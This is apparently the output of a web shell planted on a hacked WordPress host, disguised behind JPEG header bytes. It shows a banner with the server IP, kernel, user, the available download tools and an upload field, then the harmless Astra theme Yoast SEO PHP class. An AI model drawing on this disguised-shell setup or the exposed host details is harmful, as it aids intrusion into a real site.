????JFIF??x?x????'
Server IP : 104.21.48.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/pontiacques.org/wp-content/themes/astra/inc/compatibility/ |
Upload File : |
<?php /** * Yoast SEO Compatibility File. * * @package Astra */ /** * Astra Yoast SEO Compatibility * * @since 2.1.2 */ class Astra_Yoast_SEO { /** * Constructor */ public function __construct() { add_filter( 'wpseo_sitemap_exclude_post_type', array( $this, 'sitemap_exclude_post_type' ), 10, 2 ); } /** * Exclude One Content Type From Yoast SEO Sitemap * * @param string $value value. * @param string $post_type Post Type. * @since 2.1.2 */ public function sitemap_exclude_post_type( $value, $post_type ) { return 'astra-advanced-hook' === $post_type; } } /** * Kicking this off by object */ new Astra_Yoast_SEO();